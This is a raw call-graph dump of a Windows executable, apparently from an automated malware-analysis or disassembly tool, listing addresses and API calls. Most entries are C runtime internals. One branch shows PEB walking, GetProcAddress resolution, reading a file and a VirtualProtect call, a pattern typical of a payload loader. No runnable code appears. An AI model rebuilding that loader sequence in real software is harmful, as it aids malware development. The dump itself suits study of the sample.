5b1630 std::locale::_Setgloballocale 8 API calls 17489->17490 17491 5b161d GetCurrentProcess TerminateProcess 17490->17491 17491->16947 17493 5bc350 17492->17493 17494 5bc361 17493->17494 17497 5bc374 ___from_strstr_to_strchr 17493->17497 17495 5b0ee4 __strnicoll 14 API calls 17494->17495 17505 5bc366 17495->17505 17496 5bc58b 17499 5b0ee4 __strnicoll 14 API calls 17496->17499 17497->17496 17498 5bc394 17497->17498 17555 5bc5b0 17498->17555 17501 5bc590 17499->17501 17503 5b4fb7 ___free_lconv_mon 14 API calls 17501->17503 17503->17505 17504 5bc3d8 17506 5bc3c4 17504->17506 17559 5bc5ca 17504->17559 17505->16890 17512 5b4fb7 ___free_lconv_mon 14 API calls 17506->17512 17507 5bc3da 17507->17506 17511 5b62f4 __Getctype 14 API calls 17507->17511 17509 5bc3b6 17516 5bc3bf 17509->17516 17517 5bc3d3 17509->17517 17513 5bc3e8 17511->17513 17512->17505 17515 5b4fb7 ___free_lconv_mon 14 API calls 17513->17515 17514 5bc44d 17519 5b4fb7 ___free_lconv_mon 14 API calls 17514->17519 17520 5bc3f3 17515->17520 17521 5b0ee4 __strnicoll 14 API calls 17516->17521 17518 5bc5b0 39 API calls 17517->17518 17518->17504 17527 5bc455 17519->17527 17520->17504 17520->17506 17525 5b62f4 __Getctype 14 API calls 17520->17525 17521->17506 17522 5bc498 17522->17506 17523 5bb965 std::ios_base::_Init 32 API calls 17522->17523 17524 5bc4c6 17523->17524 17526 5b4fb7 ___free_lconv_mon 14 API calls 17524->17526 17528 5bc40f 17525->17528 17531 5bc482 17526->17531 17527->17531 17563 5bb965 17527->17563 17532 5b4fb7 ___free_lconv_mon 14 API calls 17528->17532 17529 5b4fb7 ___free_lconv_mon 14 API calls 17529->17505 17531->17506 17531->17531 17534 5b62f4 __Getctype 14 API calls 17531->17534 17552 5bc580 17531->17552 17532->17504 17533 5bc479 17535 5b4fb7 ___free_lconv_mon 14 API calls 17533->17535 17536 5bc511 17534->17536 17535->17531 17537 5bc519 17536->17537 17538 5bc521 17536->17538 17539 5b4fb7 ___free_lconv_mon 14 API calls 17537->17539 17540 5b4c2c ___std_exception_copy 29 API calls 17538->17540 17539->17506 17541 5bc52d 17540->17541 17542 5bc5a5 17541->17542 17543 5bc534 17541->17543 17544 5b15fc __Getctype 11 API calls 17542->17544 17572 5c34cc 17543->17572 17546 5bc5af 17544->17546 17552->17529 17556 5bc39f 17555->17556 17557 5bc5bd 17555->17557 17556->17504 17556->17507 17556->17509 17587 5bc61f 17557->17587 17561 5bc5e0 17559->17561 17562 5bc43d 17559->17562 17561->17562 17602 5c33db 17561->17602 17562->17514 17562->17522 17564 5bb98d 17563->17564 17565 5bb972 17563->17565 17569 5bb99c 17564->17569 17702 5c2364 17564->17702 17565->17564 17566 5bb97e 17565->17566 17567 5b0ee4 __strnicoll 14 API calls 17566->17567 17571 5bb983 std::bad_exception::bad_exception 17567->17571 17709 5be905 17569->17709 17571->17533 17721 5b62b5 17572->17721 17577 5c353f 17578 5b62b5 39 API calls 17588 5bc632 17587->17588 17596 5bc62d 17587->17596 17589 5b62f4 __Getctype 14 API calls 17588->17589 17599 5bc64f 17589->17599 17590 5bc6bd 17592 5b1b53 CallUnexpected 39 API calls 17590->17592 17591 5bc6ac 17593 5b4fb7 ___free_lconv_mon 14 API calls 17591->17593 17594 5bc6c2 17592->17594 17593->17596 17595 5b15fc __Getctype 11 API calls 17594->17595 17597 5bc6ce 17595->17597 17596->17556 17598 5b62f4 __Getctype 14 API calls 17598->17599 17599->17590 17599->17591 17599->17594 17599->17598 17600 5b4fb7 ___free_lconv_mon 14 API calls 17599->17600 17601 5b4c2c ___std_exception_copy 29 API calls 17599->17601 17600->17599 17601->17599 17603 5c33ef 17602->17603 17604 5c33e9 17602->17604 17620 5c3404 17603->17620 17607 5c3cab 17604->17607 17608 5c3c63 17604->17608 17640 5c3cc1 17607->17640 17610 5c3c69 17608->17610 17611 5c3c86 17608->17611 17613 5b0ee4 __strnicoll 14 API calls 17610->17613 17615 5b0ee4 __strnicoll 14 API calls 17611->17615 17619 5c3ca4 17611->17619 17612 5c3c79 17612->17561 17614 5c3c6e 17613->17614 17616 5b15cf __strnicoll 29 API calls 17614->17616 17617 5c3c95 17615->17617 17616->17612 17618 5b15cf __strnicoll 29 API calls 17617->17618 17618->17612 17619->17561 17621 5ac3ba __strnicoll 39 API calls 17620->17621 17622 5c341a 17621->17622 17623 5c3436 17622->17623 17624 5c344d 17622->17624 17638 5c33ff 17622->17638 17625 5b0ee4 __strnicoll 14 API calls 17623->17625 17627 5c3468 17624->17627 17628 5c3456 17624->17628 17626 5c343b 17625->17626 17632 5b15cf __strnicoll 29 API calls 17626->17632 17630 5c3488 17627->17630 17631 5c3475 17627->17631 17629 5b0ee4 __strnicoll 14 API calls 17628->17629 17633 5c345b 17629->17633 17658 5c3d8c 17630->17658 17634 5c3cc1 __strnicoll 39 API calls 17631->17634 17632->17638 17636 5b15cf __strnicoll 29 API calls 17633->17636 17634->17638 17636->17638 17638->17561 17639 5b0ee4 __strnicoll 14 API calls 17639->17638 17641 5c3ceb 17640->17641 17642 5c3cd1 17640->17642 17644 5c3d0a 17641->17644 17645 5c3cf3 17641->17645 17643 5b0ee4 __strnicoll 14 API calls 17642->17643 17647 5c3cd6 17643->17647 17646 5c3d16 17644->17646 17650 5c3d2d 17644->17650 17648 5b0ee4 __strnicoll 14 API calls 17645->17648 17649 5b0ee4 __strnicoll 14 API calls 17646->17649 17651 5b15cf __strnicoll 29 API calls 17647->17651 17652 5c3cf8 17648->17652 17653 5c3d1b 17649->17653 17654 5ac3ba __strnicoll 39 API calls 17650->17654 17657 5c3ce1 17650->17657 17651->17657 17655 5b15cf __strnicoll 29 API calls 17652->17655 17656 5b15cf __strnicoll 29 API calls 17653->17656 17654->17657 17655->17657 17656->17657 17657->17612 17659 5ac3ba __strnicoll 39 API calls 17658->17659 17660 5c3d9f 17659->17660 17663 5c3dd2 17660->17663 17668 5c3e06 __strnicoll 17663->17668 17664 5a6d61 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17665 5c349e 17664->17665 17665->17638 17665->17639 17666 5c3e86 17669 5b503f __strnicoll MultiByteToWideChar 17666->17669 17675 5c3e8a 17666->17675 17667 5c406a 17668->17666 17668->17667 17670 5c3e73 GetCPInfo 17668->17670 17668->17675 17672 5c3f0c 17669->17672 17670->17666 17670->17675 17671 5c405e 17673 5a9ad7 __freea 14 API calls 17671->17673 17672->17671 17674 5b4ff1 __strnicoll 15 API calls 17672->17674 17672->17675 17676 5c3f33 __alloca_probe_16 17672->17676 17673->17675 17674->17676 17675->17664 17675->17667 17676->17671 17677 5b503f __strnicoll MultiByteToWideChar 17676->17677 17678 5c3f7f 17677->17678 17678->17671 17679 5b503f __strnicoll MultiByteToWideChar 17678->17679 17680 5c3f9b 17679->17680 17680->17671 17703 5c236f 17702->17703 17704 5c2384 HeapSize 17702->17704 17705 5b0ee4 __strnicoll 14 API calls 17703->17705 17704->17569 17706 5c2374 17705->17706 17707 5b15cf __strnicoll 29 API calls 17706->17707 17708 5c237f 17707->17708 17708->17569 17710 5be91d 17709->17710 17711 5be912 17709->17711 17712 5be925 17710->17712 17719 5be92e __Getctype 17710->17719 17713 5b4ff1 __strnicoll 15 API calls 17711->17713 17714 5b4fb7 ___free_lconv_mon 14 API calls 17712->17714 17717 5be91a 17713->17717 17714->17717 17715 5be958 HeapReAlloc 17715->17717 17715->17719 17716 5be933 17718 5b0ee4 __strnicoll 14 API calls 17716->17718 17717->17571 17718->17717 17719->17715 17719->17716 17720 5af07b std::ios_base::_Init 2 API calls 17719->17720 17720->17719 17722 5ac3ba __strnicoll 39 API calls 17721->17722 17723 5b62c7 17722->17723 17724 5b62d9 17723->17724 17729 5b5b26 17723->17729 17726 5ac4b4 17724->17726 17735 5ac50c 17726->17735 17732 5b6092 17729->17732 17733 5b600d std::_Lockit::_Lockit 5 API calls 17732->17733 17734 5b5b2e 17733->17734 17734->17724 17736 5ac51a 17735->17736 17737 5ac534 17735->17737 17753 5ac49a 17736->17753 17739 5ac55a 17737->17739 17740 5ac53b 17737->17740 17741 5b503f __strnicoll MultiByteToWideChar 17739->17741 17744 5ac4cc 17740->17744 17757 5ac45b 17740->17757 17743 5ac569 17741->17743 17744->17577 17744->17578 17754 5ac4ad 17753->17754 17755 5ac4a5 17753->17755 17754->17744 17756 5b4fb7 ___free_lconv_mon 14 API calls 17755->17756 17756->17754 17758 5ac49a 14 API calls 17757->17758 17776 5a22b0 GetModuleHandleA GetModuleFileNameA 17773->17776 17783 5a1f30 17776->17783 17781 5a6d61 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17782 5a2331 17781->17782 17784 5a1f60 _Fputc 17783->17784 17798 5a2430 17784->17798 17787 5a6d61 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17788 5a1f8e 17787->17788 17789 5a21a0 17788->17789 17966 5a1c80 GetPEB 17789->17966 17791 5a21bf 17967 5a1cf0 GetProcAddress 17791->17967 17793 5a21d9 17794 5a6d61 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17793->17794 17797 5a229b 17794->17797 17795 5a21d1 17795->17793 17981 5a2050 17795->17981 17797->17781 17799 5a2459 17798->17799 17802 5acf58 17799->17802 17801 5a1f7b 17801->17787 17803 5acf6c _Fputc 17802->17803 17804 5acf8e 17803->17804 17806 5acfb5 17803->17806 17805 5b1778 _Fputc 29 API calls 17804->17805 17808 5acfa9 _Fputc 17805->17808 17809 5ae70d 17806->17809 17808->17801 17810 5ae719 ___scrt_is_nonwritable_in_current_image 17809->17810 17817 5acd0f EnterCriticalSection 17810->17817 17812 5ae727 17818 5ae0e2 17812->17818 17817->17812 17832 5b76cb 17818->17832 17820 5ae109 17839 5ad531 17820->17839 17827 5a6d61 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17828 5ae17c 17827->17828 17829 5ae75c 17828->17829 17862 5b7776 17832->17862 17834 5b773e 17834->17820 17835 5b76dc _Fputc 17835->17834 17836 5b4ff1 __strnicoll 15 API calls 17835->17836 17837 5b7735 17836->17837 17838 5b4fb7 ___free_lconv_mon 14 API calls 17837->17838 17838->17834 17869 5ad493 17839->17869 17842 5ad557 17843 5b1778 _Fputc 29 API calls 17842->17843 17844 5ad574 17843->17844 17855 5ad261 17844->17855 17849 5ad3f2 66 API calls 17850 5ad57f std::_Locinfo::_Locinfo_dtor 17849->17850 17850->17844 17850->17849 17851 5ad773 17850->17851 17875 5ad190 17850->17875 17881 5ad7e1 17850->17881 17884 5ad859 17850->17884 17924 5ad9b2 17850->17924 17852 5b1778 _Fputc 29 API calls 17851->17852 17853 5ad78d 17852->17853 17854 5b1778 _Fputc 29 API calls 17853->17854 17854->17844 17856 5b4fb7 ___free_lconv_mon 14 API calls 17855->17856 17857 5ad271 17856->17857 17858 5b77b4 17857->17858 17859 5b77bf 17858->17859 17861 5ae16a 17858->17861 17859->17861 17959 5b1db8 17859->17959 17861->17827 17863 5b7782 _Fputc 17862->17863 17864 5b77ac 17863->17864 17865 5b8744 _Ungetc 29 API calls 17863->17865 17864->17835 17866 5b779d 17865->17866 17867 5bfd5f _Fputc 29 API calls 17866->17867 17868 5b77a3 17867->17868 17868->17835 17870 5ad49e 17869->17870 17871 5ad4c0 17869->17871 17872 5b1778 _Fputc 29 API calls 17870->17872 17873 5acffc 29 API calls 17871->17873 17874 5ad4b9 17872->17874 17873->17874 17874->17842 17874->17844 17874->17850 17876 5ad1a0 17875->17876 17877 5b5888 _Fputc 39 API calls 17876->17877 17878 5ad1bd 17877->17878 17879 5b58b9 _Fputc 39 API calls 17878->17879 17880 5ad1ca 17879->17880 17880->17850 17882 5ae7da 29 API calls 17881->17882 17883 5ad81c 17882->17883 17883->17850 17885 5ad860 17884->17885 17886 5ad877 17884->17886 17888 5ada42 17885->17888 17889 5ad9d6 17885->17889 17895 5ad8b6 17885->17895 17887 5b1778 _Fputc 29 API calls 17886->17887 17886->17895 17890 5ad8ab 17887->17890 17893 5ada81 17888->17893 17894 5ada47 17888->17894 17891 5ada6a 17889->17891 17892 5ad9dc 17889->17892 17890->17850 17902 5ae580 30 API calls 17891->17902 17905 5ad9e1 17892->17905 17906 5ada37 17892->17906 17896 5adaa0 17893->17896 17897 5ada86 17893->17897 17898 5ada78 17894->17898 17899 5ada49 17894->17899 17895->17850 17900 5ae00c 30 API calls 17896->17900 17897->17891 17897->17906 17915 5ada09 17897->17915 17903 5adfef 30 API calls 17898->17903 17901 5ad9f0 17899->17901 17908 5ada58 17899->17908 17900->17915 17904 5ade5e 42 API calls 17901->17904 17918 5adaab 17901->17918 17902->17915 17903->17915 17904->17915 17905->17901 17909 5ada1c 17905->17909 17905->17915 17907 5ae266 30 API calls 17906->17907 17906->17918 17907->17915 17908->17891 17911 5ada5c 17908->17911 17910 5adcf4 41 API calls 17909->17910 17909->17918 17910->17915 17911->17918 17912 5a6d61 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17916 5ad4cb 66 API calls 17915->17916 17915->17918 17920 5adbac 17915->17920 17916->17915 17917 5ad4cb 66 API calls 17917->17920 17918->17912 17920->17917 17922 5adc1f 17920->17922 17925 5ada42 17924->17925 17926 5ad9d6 17924->17926 17929 5ada81 17925->17929 17930 5ada47 17925->17930 17927 5ada6a 17926->17927 17928 5ad9dc 17926->17928 17936 5ae580 30 API calls 17927->17936 17940 5ad9e1 17928->17940 17941 5ada37 17928->17941 17931 5adaa0 17929->17931 17932 5ada86 17929->17932 17933 5ada78 17930->17933 17934 5ada49 17930->17934 17935 5ae00c 30 API calls 17931->17935 17932->17927 17932->17941 17951 5ada09 17932->17951 17937 5adfef 30 API calls 17933->17937 17938 5ad9f0 17934->17938 17945 5ada58 17934->17945 17935->17951 17936->17951 17937->17951 17939 5ade5e 42 API calls 17938->17939 17943 5adaab 17938->17943 17939->17951 17940->17938 17942 5ada1c 17940->17942 17940->17951 17941->17943 17944 5ae266 30 API calls 17941->17944 17942->17943 17947 5adcf4 41 API calls 17942->17947 17948 5a6d61 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17943->17948 17944->17951 17945->17927 17946 5ada5c 17945->17946 17946->17943 17950 5ae022 29 API calls 17946->17950 17947->17951 17949 5adcf2 17948->17949 17949->17850 17950->17951 17951->17943 17952 5ad4cb 66 API calls 17951->17952 17953 5adbac 17951->17953 17952->17951 17954 5ad4cb 66 API calls 17953->17954 17957 5adc1f 17953->17957 17954->17953 17955 5adc84 17955->17943 17956 5b8470 _Fputc 41 API calls 17956->17957 17957->17955 17957->17956 17960 5b1dd1 17959->17960 17964 5b1df8 17959->17964 17960->17964 17964->17861 17966->17791 17968 5a1d39 CreateFileA 17967->17968 17969 5a1d8a 17968->17969 17970 5a1d93 GetFileSize 17968->17970 17973 5a6d61 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17969->17973 17971 5a1db9 CloseHandle 17970->17971 17972 5a1dd1 17970->17972 17971->17969 17993 5a6d53 17972->17993 17976 5a1e78 17973->17976 17976->17795 17977 5a1e1c 17979 5a1e38 CloseHandle 17977->17979 17980 5a1e2d 17977->17980 17978 5a1e50 CloseHandle 17978->17969 17979->17969 17980->17979 18007 5a1000 17981->18007 17984 5a1000 104 API calls 17985 5a20fb GetProcAddress 17984->17985 17986 5a2124 VirtualProtect 17985->17986 17988 5a217c 17986->17988 17989 5a2171 17986->17989 17991 5a6d61 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17988->17991 18015 5a1cb0 17989->18015 17992 5a218b 17991->17992 17992->17793 17994 5a6ce3 _Yarn 17993->17994 17995 5a1ddc ReadFile 17994->17995 17996 5af07b std::ios_base::_Init 2 API calls 17994->17996 17997 5a6d04 17994->17997 17995->17977 17995->17978 17996->17994 17998 5a908e std::ios_base::_Init 17997->17998 18000 5a6d0e Concurrency::cancel_current_task 17997->18000 17999 5aa02c Concurrency::cancel_current_task RaiseException 17998->17999 18001 5a90aa 17999->18001 18004 5aa02c 18000->18004 18003 5a7503 18005 5aa046 18004->18005 18006 5aa074 RaiseException 18004->18006 18005->18006 18006->18003 18013 5a103e _Yarn 18007->18013 18008 5a12ca 18009 5a6d61 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18008->18009 18012 5a12d4 18009->18012 18012->17984 18013->18008 18014 5b262e _Yarn 14 API calls 18013->18014 18019 5a1310 18013->18019 18035 5a1870 18013->18035 18014->18013 18016 5a1cda 18015->18016 18021 5a1360 _strlen 18019->18021 18049 5a24c0 18021->18049 18022 5a1401 18028 5a1414 18022->18028 18053 5a25f0 18022->18053 18075 5a2a20 18028->18075 18037 5a18c0 18035->18037 18036 5a24c0 39 API calls 18047 5a1961 18036->18047 18037->18036 18038 5a2a20 39 API calls 18039 5a1bd7 18038->18039 18041 5a2a70 39 API calls 18039->18041 18040 5a1974 18040->18038 18042 5a1a27 18048 5a1a86 18042->18048 18242 5a6750 18042->18242 18045 5a28a0 70 API calls 18045->18047 18046 5a28a0 70 API calls 18046->18048 18047->18040 18047->18042 18047->18045 18048->18040 18048->18046 18051 5a2509 18049->18051 18050 5a2521 18050->18022 18051->18050 18083 5a2b50 18051->18083 18091 5a7074 18053->18091 18076 5a2a45 18075->18076 18084 5a2b92 18083->18084 18085 5a2c45 18084->18085 18086 5a24c0 39 API calls 18084->18086 18085->18050 18089 5a2bad 18086->18089 18243 5a6794 18242->18243 18246 5a8500 18243->18246 18249 5a7ea0 18246->18249 18255 5aeed3 18254->18255 18256 5aeec1 18254->18256 18266 5af02e 18255->18266 18257 5a95f0 std::locale::_Setgloballocale GetModuleHandleW 18256->18257 18259 5aeec6 18257->18259 18259->18255 18281 5aedc8 GetModuleHandleExW 18259->18281 18261 5a9e9b 18261->16776 18267 5af03a ___scrt_is_nonwritable_in_current_image 18266->18267 18287 5b18e1 EnterCriticalSection 18267->18287 18269 5af044 18288 5aef2b 18269->18288 18271 5af051 18292 5af06f 18271->18292 18274 5aee63 18317 5aee4a 18274->18317 18276 5aee6d 18277 5aee81 18276->18277 18278 5aee71 GetCurrentProcess TerminateProcess 18276->18278 18279 5aedc8 std::locale::_Setgloballocale 3 API calls 18277->18279 18278->18277 18280 5aee89 ExitProcess 18279->18280 18282 5aee28 18281->18282 18283 5aee07 GetProcAddress 18281->18283 18285 5aee2e FreeLibrary 18282->18285 18286 5aee37 18282->18286 18283->18282 18284 5aee1b 18283->18284 18284->18282 18285->18286 18286->18255 18287->18269 18289 5aef37 ___scrt_is_nonwritable_in_current_image std::locale::_Setgloballocale 18288->18289 18291 5aef9b std::locale::_Setgloballocale 18289->18291 18295 5b0bfe 18289->18295 18291->18271 18316 5b18f8 LeaveCriticalSection 18292->18316 18294 5aef0a 18294->18261 18294->18274 18296 5b0c0a __EH_prolog3 18295->18296 18299 5b0e89 18296->18299 18298 5b0c31 std::ios_base::_Init 18298->18291 18300 5b0e95 ___scrt_is_nonwritable_in_current_image 18299->18300 18307 5b18e1 EnterCriticalSection 18300->18307 18302 5b0ea3 18308 5b0d54 18302->18308 18307->18302 18309 5b0d6b 18308->18309 18310 5b0d73 18308->18310 18312 5b0ed8 18309->18312 18310->18309 18311 5b4fb7 ___free_lconv_mon 14 API calls 18310->18311 18311->18309 18315 5b18f8 LeaveCriticalSection 18312->18315 18314 5b0ec1 18314->18298 18315->18314 18316->18294 18320 5b884a 18317->18320 18319 5aee4f std::locale::_Setgloballocale 18319->18276 18321 5b8859 std::locale::_Setgloballocale 18320->18321 18322 5b8866 18321->18322 18324 5b5ec0 18321->18324 18322->18319 18325 5b600d std::_Lockit::_Lockit 5 API calls 18324->18325 18326 5b5edc 18325->18326 18326->18322 18328 5acc9f ___scrt_uninitialize_crt 18327->18328 18329 5acc8d 18327->18329 18328->16769 18330 5acc9b 18329->18330 18332 5b1d4a 18329->18332 18330->16769 18335 5b1e75 18332->18335 18338 5b1f4e 18335->18338 18339 5b1f5a ___scrt_is_nonwritable_in_current_image 18338->18339 18346 5b18e1 EnterCriticalSection 18339->18346 18341 5b1fd0 18355 5b1fee 18341->18355 18343 5b1f64 ___scrt_uninitialize_crt 18343->18341 18347 5b1ec2 18343->18347 18346->18343 18348 5b1ece ___scrt_is_nonwritable_in_current_image 18347->18348 18358 5acd0f EnterCriticalSection 18348->18358 18350 5b1ed8 ___scrt_uninitialize_crt 18351 5b1f11 18350->18351 18359 5b1d53 18350->18359 18370 5b1f42 18351->18370 18422 5b18f8 LeaveCriticalSection 18355->18422 18357 5b1d51 18357->18330 18358->18350 18360 5b1d68 _Fputc 18359->18360 18361 5b1d7a 18360->18361 18362 5b1d6f 18360->18362 18364 5b1db8 ___scrt_uninitialize_crt 64 API calls 18361->18364 18363 5b1e75 ___scrt_uninitialize_crt 68 API calls 18362->18363 18366 5b1d75 _Fputc 18363->18366 18365 5b1d84 18364->18365 18365->18366 18373 5b8744 18365->18373 18366->18351 18368 5b1d9b 18380 5bcb85 18368->18380 18421 5acd23 LeaveCriticalSection 18370->18421 18372 5b1f30 18372->18343 18374 5b8750 18373->18374 18375 5b8765 18373->18375 18376 5b0ee4 __strnicoll 14 API calls 18374->18376 18375->18368 18377 5b8755 18376->18377 18378 5b15cf __strnicoll 29 API calls 18377->18378 18379 5b8760 18378->18379 18379->18368 18381 5bcb96 18380->18381 18384 5bcba3 18380->18384 18382 5b0ee4 __strnicoll 14 API calls 18381->18382 18390 5bcb9b 18382->18390 18383 5bcbec 18385 5b0ee4 __strnicoll 14 API calls 18383->18385 18384->18383 18387 5bcbca 18384->18387 18386 5bcbf1 18385->18386 18388 5b15cf __strnicoll 29 API calls 18386->18388 18391 5bcc02 18387->18391 18388->18390 18390->18366 18392 5bcc0e ___scrt_is_nonwritable_in_current_image 18391->18392 18404 5bc918 EnterCriticalSection 18392->18404 18394 5bcc1d 18404->18394 18421->18372 18422->18357 21147 5a8520 21148 5a8534 21147->21148 21149 5a8785 69 API calls 21148->21149 21154 5a858f 21148->21154 21150 5a855f 21149->21150 21151 5a857c 21150->21151 21150->21154 21155 5b0f94 21150->21155 21151->21154 21159 5b21ba 21151->21159 21156 5b0fa7 _Fputc 21155->21156 21173 5b120d 21156->21173 21158 5b0fbc _Fputc 21158->21151 21160 5b21da 21159->21160 21161 5b21c5 21159->21161 21163 5b21e2 21160->21163 21164 5b21f7 21160->21164 21162 5b0ee4 __strnicoll 14 API calls 21161->21162 21166 5b21ca 21162->21166 21167 5b0ee4 __strnicoll 14 API calls 21163->21167 21259 5bbc36 21164->21259 21169 5b15cf __strnicoll 29 API calls 21166->21169 21170 5b21e7 21167->21170 21168 5b21f2 21168->21154 21171 5b21d5 21169->21171 21172 5b15cf __strnicoll 29 API calls 21170->21172 21171->21154 21172->21168 21174 5b1219 ___scrt_is_nonwritable_in_current_image 21173->21174 21175 5b121f 21174->21175 21178 5b1262 21174->21178 21176 5b1778 _Fputc 29 API calls 21175->21176 21177 5b123a 21176->21177 21177->21158 21184 5acd0f EnterCriticalSection 21178->21184 21180 5b126e 21185 5b1121 21180->21185 21182 5b1284 21196 5b12ad 21182->21196 21184->21180 21186 5b1147 21185->21186 21187 5b1134 21185->21187 21199 5b1048 21186->21199 21187->21182 21189 5b116a 21190 5b11f8 21189->21190 21191 5b1185 21189->21191 21203 5bbc6c 21189->21203 21190->21182 21193 5b1db8 ___scrt_uninitialize_crt 64 API calls 21191->21193 21194 5b1198 21193->21194 21217 5bba52 21194->21217 21258 5acd23 LeaveCriticalSection 21196->21258 21198 5b12b5 21198->21177 21200 5b1059 21199->21200 21202 5b10b1 21199->21202 21201 5bba12 31 API calls 21200->21201 21200->21202 21201->21202 21202->21189 21204 5bc03e 21203->21204 21205 5bc04d 21204->21205 21206 5bc075 21204->21206 21207 5b1778 _Fputc 29 API calls 21205->21207 21208 5b8744 _Ungetc 29 API calls 21206->21208 21214 5bc068 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21207->21214 21209 5bc07e 21208->21209 21220 5bba70 21209->21220 21212 5bc128 21223 5bbcc8 21212->21223 21214->21191 21215 5bc13f 21215->21214 21235 5bbe73 21215->21235 21218 5bbbb3 _Fputc 31 API calls 21217->21218 21219 5bba6b 21218->21219 21219->21190 21242 5bba8e 21220->21242 21224 5bbcd7 _Fputc 21223->21224 21225 5b8744 _Ungetc 29 API calls 21224->21225 21227 5bbcf3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21225->21227 21226 5a6d61 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21228 5bbe71 21226->21228 21229 5bba70 33 API calls 21227->21229 21234 5bbcff 21227->21234 21228->21214 21230 5bbd53 21229->21230 21231 5bbd85 ReadFile 21230->21231 21230->21234 21232 5bbdac 21231->21232 21231->21234 21233 5bba70 33 API calls 21232->21233 21233->21234 21234->21226 21236 5b8744 _Ungetc 29 API calls 21235->21236 21237 5bbe86 21236->21237 21238 5bba70 33 API calls 21237->21238 21241 5bbed0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21237->21241 21239 5bbf2d 21238->21239 21240 5bba70 33 API calls 21239->21240 21239->21241 21240->21241 21241->21214 21243 5bba9a ___scrt_is_nonwritable_in_current_image 21242->21243 21244 5bba89 21243->21244 21245 5bbadd 21243->21245 21247 5bbb23 21243->21247 21244->21212 21244->21214 21244->21215 21246 5b1778 _Fputc 29 API calls 21245->21246 21246->21244 21253 5bc918 EnterCriticalSection 21247->21253 21249 5bbb29 21250 5bbb4a 21249->21250 21251 5bbbb3 _Fputc 31 API calls 21249->21251 21254 5bbbab 21250->21254 21251->21250 21253->21249 21257 5bc93b LeaveCriticalSection 21254->21257 21256 5bbbb1 21256->21244 21257->21256 21258->21198 21260 5bbc4a _Fputc 21259->21260 21263 5bc1df 21260->21263 21262 5bbc56 _Fputc 21262->21168 21264 5bc1eb ___scrt_is_nonwritable_in_current_image 21263->21264 21265 5bc1f2 21264->21265 21266 5bc215 21264->21266 21268 5b1778 _Fputc 29 API calls 21265->21268 21274 5acd0f EnterCriticalSection 21266->21274 21270 5bc20b 21268->21270 21269 5bc223 21275 5bc03e 21269->21275 21270->21262 21272 5bc232 21288 5bc264 21272->21288 21274->21269 21276 5bc04d 21275->21276 21277 5bc075 21275->21277 21278 5b1778 _Fputc 29 API calls 21276->21278 21279 5b8744 _Ungetc 29 API calls 21277->21279 21286 5bc068 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21278->21286 21280 5bc07e 21279->21280 21281 5bba70 33 API calls 21280->21281 21282 5bc09c 21281->21282 21283 5bc128 21282->21283 21285 5bc13f 21282->21285 21282->21286 21284 5bbcc8 34 API calls 21283->21284 21284->21286 21285->21286 21287 5bbe73 33 API calls 21285->21287 21286->21272 21287->21286 21291 5acd23 LeaveCriticalSection 21288->21291 21290 5bc26c 21290->21270 21291->21290 19906 5b54f0 19907 5b54fb 19906->19907 19908 5b550b 19906->19908 19912 5b55f5 19907->19912 19911 5b4fb7 ___free_lconv_mon 14 API calls 19911->19908 19913 5b560a 19912->19913 19914 5b5610 19912->19914 19915 5b4fb7 ___free_lconv_mon 14 API calls 19913->19915 19916 5b4fb7 ___free_lconv_mon 14 API calls 19914->19916 19915->19914 19917 5b561c 19916->19917 19918 5b4fb7 ___free_lconv_mon 14 API calls 19917->19918 19919 5b5627 19918->19919 19920 5b4fb7 ___free_lconv_mon 14 API calls 19919->19920 19921 5b5632 19920->19921 19922 5b4fb7 ___free_lconv_mon 14 API calls 19921->19922 19923 5b563d 19922->19923 19924 5b4fb7 ___free_lconv_mon 14 API calls 19923->19924 19925 5b5648 19924->19925 19926 5b4fb7 ___free_lconv_mon 14 API calls 19925->19926 19927 5b5653 19926->19927 19928 5b4fb7 ___free_lconv_mon 14 API calls 19927->19928 19929 5b565e 19928->19929 19930 5b4fb7 ___free_lconv_mon 14 API calls 19929->19930 19931 5b5669 19930->19931 19932 5b4fb7 ___free_lconv_mon 14 API calls 19931->19932 19933 5b5677 19932->19933 19938 5b576e 19933->19938 19939 5b577a ___scrt_is_nonwritable_in_current_image 19938->19939 19954 5b18e1 EnterCriticalSection 19939->19954 19941 5b57ae 19955 5b57cd 19941->19955 19944 5b5784 19944->19941 19945 5b4fb7 ___free_lconv_mon 14 API calls 19944->19945 19945->19941 19946 5b57d9 19947 5b57e5 ___scrt_is_nonwritable_in_current_image 19946->19947 19959 5b18e1 EnterCriticalSection 19947->19959 19949 5b57ef 19950 5b5511 __Getctype 14 API calls 19949->19950 19951 5b5802 19950->19951 19960 5b5822 19951->19960 19954->19944 19958 5b18f8 LeaveCriticalSection 19955->19958 19957 5b569d 19957->19946 19958->19957 19959->19949 19963 5b18f8 LeaveCriticalSection 19960->19963 19962 5b5503 19962->19911 19963->19962 19982 5a86e0 19983 5a871e 